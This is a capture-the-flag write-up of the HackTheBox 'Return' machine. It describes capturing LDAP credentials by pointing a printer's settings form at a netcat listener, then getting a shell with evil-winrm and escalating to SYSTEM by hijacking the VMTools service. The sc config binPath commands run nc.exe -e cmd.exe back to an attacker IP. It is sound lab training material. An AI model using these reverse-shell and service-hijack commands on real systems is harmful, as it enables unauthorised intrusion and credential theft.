We covered a machine with a printer exposed to the public via port 80. The printer contained a form that sends an LDAP request internally. We were able to hijack the LDAP packets and redirect it to our machine where we intercepted a pair of credentials which landed us a shell on the machine. Privilege escalation was accomplished on the windows active directory machine through the server operators group and by exploiting an existing service and changing its binary path to an executable we control. This was part of intro to printer exploitation HackTheBox Return.
Initial Printer Access & Discovery
I began by accessing the printer’s web interface via its IP address on port 80. Navigating to the “Settings” section, I found a pre-filled form containing variables like server address (print.return.local), server port, username, and password. I quickly identified the server port as 389, which is typically used for LDAP (Lightweight Directory Access Protocol). An nmap scan confirmed that LDAP was indeed running on port 389, suggesting the printer was on a Windows machine. The password in the form was obscured with asterisks, and simply inspecting it with browser developer tools didn’t reveal the plaintext.
Exploiting the Printer Form (Man-in-the-Middle Variation)
My strategy was to perform a Man-in-the-Middle (MITM) attack to capture the credentials. Since I couldn’t be on the printer’s local network, I decided to redirect the printer’s LDAP request to my own machine. I changed the “Server Address” in the form to my machine’s IP address. Then, I started a listener on my machine on port 389. When I clicked the “Update” button on the printer’s web form, the printer obligingly sent the LDAP authentication request (containing the username and password) to my machine. This worked because there was no input validation on the server address field. I successfully captured the credentials: the username was return\SVC_PRINTER (a service account for the printer), and I also obtained the password. I noted that the vulnerability lay in this lack of input validation and that such an interface, allowing LDAP requests, should ideally only be accessible to administrators.
Gaining Initial Shell Access
With the captured credentials, I used evil-winrm, a tool for remote management of Windows machines, to log into the target machine. I made sure to enclose the password in single or double quotes because it contained exclamation marks. This granted me a shell as the SVC_PRINTER user, and I was able to access the user flag.
Privilege Escalation (Windows Active Directory)
The next step was to escalate privileges. I noted that this part was more about Windows Active Directory privilege escalation than printer exploitation. I used the command whoami /priv to list the current user’s privileges. Several interesting privileges caught my eye:
SeLoadDriverPrivilege: Allows loading drivers.SeMachineAccountPrivilege: Allows adding workstations to the domain. This was the method I chose for this video.SeBackupPrivilege: Allows backing up files and directories, which could be used to dump SAM and SYSTEM files.
I also used a command (similar to net user SVC_PRINTER /domain) to show that SVC_PRINTER was a member of the “Server Operators” group. This was unusual for a regular user and indicated a misconfiguration, as members of “Server Operators” can manipulate services.
My goal was to find a service that the “Server Operators” group could modify and then change its binary path to execute a malicious payload. After some initial attempts with PowerShell commands that didn’t work as expected, I resorted to listing all services (using a command that looked like sc query state= all | findstr /I /C:"SERVICE_NAME" /C:"DISPLAY_NAME" /C:"STATE"). I looked for services that could be modified and chose the VMTools service.
I then uploaded a copy of netcat to the target machine using evil-winrm. I changed the service’s binary path using the sc config command. This command tells the VMTools service to run netcat instead of its usual program, and netcat would connect back to my machine, providing a command shell.
My first attempt resulted in an unstable shell that disconnected due to a service timeout. To make the shell more stable, I modified the binPath again to run netcat through cmd.exe. This provided a stable shell as NT AUTHORITY\SYSTEM, and I successfully captured the root flag.
Unresolved Challenge (“Line”)
Finally, I briefly mentioned another challenge called “Line” involving an LPD (Line Printer Daemon) protocol, which I was unable to solve and asked for community input.
Technical Commands Explained
Here are the technical commands I used and their explanations:
sudo nmap -p 389 <IP_ADDRESS>sudo: Executes the command with superuser (root) privileges, often necessary fornmapto perform certain scans.nmap: Network Mapper, a powerful tool for network discovery and security auditing.-p 389: Scans only port 389, the standard port for LDAP.<IP_ADDRESS>: The target machine’s IP address.- Purpose: To check if port 389 is open and what service is running on it.
nc -lvnp 389(or similar listener command)nc: Netcat, a versatile networking utility.-l: Listen mode for incoming connections.-v: Verbose output.-n: Numeric-only IP addresses, no DNS.-p 389: Listen on port 389.- Purpose: To set up a listener on my machine to capture the printer’s LDAP authentication request, including credentials.
evil-winrm -i <IP_ADDRESS> -u 'return\SVC_PRINTER' -p '<PASSWORD>'evil-winrm: A tool using Windows Remote Management (WinRM) to get a shell on a Windows machine.-i <IP_ADDRESS>: Specifies the target Windows machine’s IP address.-u 'return\SVC_PRINTER': Specifies the username, including the domain name.-p '<PASSWORD>': Specifies the password. Single quotes are crucial for passwords with special characters.- Purpose: To establish a remote shell connection using the captured credentials.
whoami /privwhoami: Displays the current user’s username./priv: A Windows-specific switch to display the security privileges held by the current user.- Purpose: To list
SVC_PRINTER‘s privileges to identify privilege escalation paths.
sc query state= all | findstr /I /C:"SERVICE_NAME" /C:"DISPLAY_NAME" /C:"STATE"(This is a typical way to list services from the command line, though the video’s initial output might be from a custom script.)sc query state= all: Uses the Service Control command-line program to list all services regardless of their state.|: Pipes the output ofsc querytofindstr.findstr: Searches for strings in command output./I: Case-insensitive search./C:"STRING": Searches for the literal string.- Purpose: To list all services and filter for relevant information like name, display name, and state, helping to find a service to hijack.
sc config <ServiceName> binPath= "<NewPathToExecutable> <Arguments>"sc config <ServiceName>: Modifies a service’s configuration.binPath= "<NewPathToExecutable> <Arguments>": Changes the executable that the service runs when it starts.- Examples from the video:
sc config VMTools binPath= "C:\Users\SVC_PRINTER\Desktop\nc.exe -e cmd.exe <ATTACKER_IP> 4545"- Changes
VMToolsto runnetcatfrom the desktop. -e cmd.exe: Tellsnetcatto execute a command prompt and make its I/O available over the network.<ATTACKER_IP> 4545: Instructsnetcatto connect back to my IP on port 4545.
- Changes
sc config VMTools binPath= "cmd.exe /c C:\Users\SVC_PRINTER\Desktop\nc.exe -e cmd.exe <ATTACKER_IP> 4545"- A more robust version, running
netcatthroughcmd.exeto maintain the process if the service is unstable.
- A more robust version, running
- Purpose: To hijack a legitimate service, making it run a malicious executable (a
netcatreverse shell) with the service’s privileges (often SYSTEM).
sc stop <ServiceName>- Purpose: To stop the specified service before restarting it with the new
binPath.
- Purpose: To stop the specified service before restarting it with the new
sc start <ServiceName>- Purpose: To start the specified service, which will now execute the modified
binPath(thenetcatreverse shell).
- Purpose: To start the specified service, which will now execute the modified
